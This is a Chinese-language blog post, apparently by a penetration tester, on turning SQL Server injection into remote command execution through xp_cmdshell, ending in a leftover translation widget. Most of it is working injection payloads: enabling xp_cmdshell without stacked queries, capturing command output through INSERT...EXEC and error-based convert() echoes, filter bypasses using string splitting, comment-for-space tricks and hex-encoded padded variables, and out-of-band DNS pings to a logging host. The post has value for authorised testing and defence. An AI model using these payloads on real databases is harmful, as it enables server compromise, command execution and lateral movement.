背景:在漏洞挖掘中，合理的利用sql注入，可以把注入转换成rce，使一个高危漏洞变成严重漏洞。在红蓝对抗中，利用注入rce，实现内网横向移动。笔者基于漏洞挖掘和红蓝对抗上遇到的sql server注入做了个sql server的rce实践总结。

1.如何判断sql server是否可以rce?

select user;

权限为dbo

　确定当前用户是否为管理员:

SELECT IS_SRVROLEMEMBER('sysadmin')

只有是sysadmin组的sql server账号才能执行系统命令

2.sql server 命令执行 xp_cmdshell扩展

exec master..xp_cmdshell 'ping a43bade1.ipv6.bypass.eu.org'

直接执行会报错，尝试开启xp_cmdshell:

在高版本的sql server中已经无法使用xp_cmdshell ，测试版本sql server2017.

详细介绍如下:https://stackoverflow.com/questions/59971345/cannot-enable-xp-cmdshell-on-sql-server-2017-express-on-linux

切换sql server为2008:

开启xp_cmdshell:

EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

3.sql server特性:

数字+字符串，不会报错 sql server会认为id=1and 1=1 就是id=1和and 1=1，自动会做处理

4.变量声明特性 DECLARE

不需要set也能声明变量使用:

1> DECLARE @bc varchar (8000) = 0x6f72616e6765;
2> select * from Inventory where name=@bc;
3> go

bypass:允许空格脏数据

DECLARE @i varchar (8000) = 0x6f72616e6765202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020

2> select * from Inventory where name=@i;
3> go

不影响执行，原因在于数据后面的空格会被处理掉:

1> select * from Inventory where name="orange";
2> select * from Inventory where name="orange

完全不影响执行

数据前后支持填充00 bypass:

1> DECLARE @i varchar (8000) = 0x0000000000000000000000006f72616e6765000000000000000000000000000000
2> select * from Inventory where name=@i;
3> go

不会影响数据正常执行

5.sql server不支持堆叠也可以rce:

支持查询显示的sql server注入，不支持堆叠也可以rce:

select * from student where name='test'INSERT temp_abcdzxc(data) EXEC master..xp_cmdshell 'whoami' select '1'
select * from student where name='test'INSERT temp_abcdzxc(data) EXECute master..xp_cmdshell 'ipconfig'-- 123
ipconfig内容很大，会自动分行:

使用execute bypass:

如果命令执行的语句包含空格，那么需要双引号包裹:
execute('xp_cmdshell "nslookup baidu.com"')

一些变形:
支持换行空格填充
execute('xp_c'+'md' +
'sh'+'ell'+' w'+'ho'+'ami')

更大的变形bypass:
execute('xp_c'+'md' +
'sh'+'ell'+'

'+'"nslookup baidu.com"')

关键字检测的变形:
execute('xp_c'+'md' +
'sh'+'ell'+'

'+'"nsl'+'ookup ba'+'idu.com"')

执行图在下方:

6.实战利用 不支持堆叠的情况下，可以进行报错注入回显 条件:支持sql语句报错

以数字类型sql注入为例:

第一步创建sql:
select * from student where id=1CREATE TABLE test_exec(id INT PRIMARY KEY IDENTITY, data VARCHAR(2100))

第二步:

执行存储过程命令执行插入数据到相关列中:
select * from student where id=1 INSERT into test_exec(data) execute('xp_cmdshell whoami')

第三步:

通过sql报错回显命令:
select * from student where id=1 and 1=convert(int,(select data from test_exec where id=1))

成功执行命令

7.sql server不支持堆叠开启xp_cmdshell:

第一步:关闭xp_cmdshell:

RECONFIGURE;EXEC sp_configure 'xp_cmdshell',0
execute('xp_cmdshell "nslookup baidu.com"')

第二步:不支持堆叠的情况下启动xp_cmdshell:

以字符串注入为例子:

select * from student where name='ddd' execute('EXEC sp_configure "xp_cmdshell",1')
select * from student where name='ddd' execute('RECONFIGURE')

再次执行命令,执行成功没用到分号:

方法2:使用exec执行存储过程 用于过滤括号()的场景:

select * from student where name='ddd' exec sp_configure xp_cmdshell,1
select * from student where name='ddd' RECONFIGURE

成功执行命令

8.hw实战案例，过滤(),=,空格 ，进行盲注执行命令例子:

因为过滤了空格无法使用声明变量的方式执行命令
select * from student where name='ddd'/**/exec/**/sp_configure/**/xp_cmdshell,1
select * from student where name='ddd'/**/RECONFIGURE

因为过滤空格，所以执行命令需要使用特殊办法规避空格
execute('xp_cmdshell/**/"nslookup%CommonProgramFiles:~10,-18%baidu.com"')

9.关闭高级扩展不彻底导致的rce:

exec sp_configure 'show advanced options',0
RECONFIGURE
exec xp_cmdshell "whoami"

问题导致的原因:

10.判断是否支持声明变量的办法:

延迟2s
select * from student where name='ddd' declare @i varchar(3000)=0x77616974666F722064656C61792027303A303A3227 execute(@i)

如果支持执行命令:

玩法巨多，说一种bypass的:

select * from student where name='ddd' declare @i varchar(3000)=0x6e736c6f6f6b75702062616964752e636f6d00000000
exec-- 123
xp_cmdshell
@i

成功执行命令:

11.判断是否支持堆叠查询:

1.产生延迟
select * from student where name='ddd';waitfor delay '0:0:2'-- 123
2.返回200 和返回异常
select * from student where name='ddd'select '1'
select * from student where name='ddd'select EXP(111111)-- 123
图在下方:

12.补充 []字符串:今早chybeta给我发了个文章，我补充下[]的内容:

使用[]字符串 bypass:

参考链接:https://www.gosecure.net/blog/2023/06/21/aws-waf-clients-left-vulnerable-to-sql-injection-due-to-unorthodox-mssql-design-choice/

TRANSLATE with x

English

Arabic

Hebrew

Polish

Bulgarian

Hindi

Portuguese

Catalan

Hmong Daw

Romanian

Chinese Simplified

Hungarian

Russian

Chinese Traditional

Indonesian

Slovak

Czech

Italian

Slovenian

Danish

Japanese

Spanish

Dutch

Klingon

Swedish

English

Korean

Thai

Estonian

Latvian

Turkish

Finnish

Lithuanian

Ukrainian

French

Malay

Urdu

German

Maltese

Vietnamese

Greek

Norwegian

Welsh

Haitian Creole

Persian

 

TRANSLATE with

COPY THE URL BELOW

Back

EMBED THE SNIPPET BELOW IN YOUR SITE

Enable collaborative features and customize widget: Bing Webmaster Portal

Back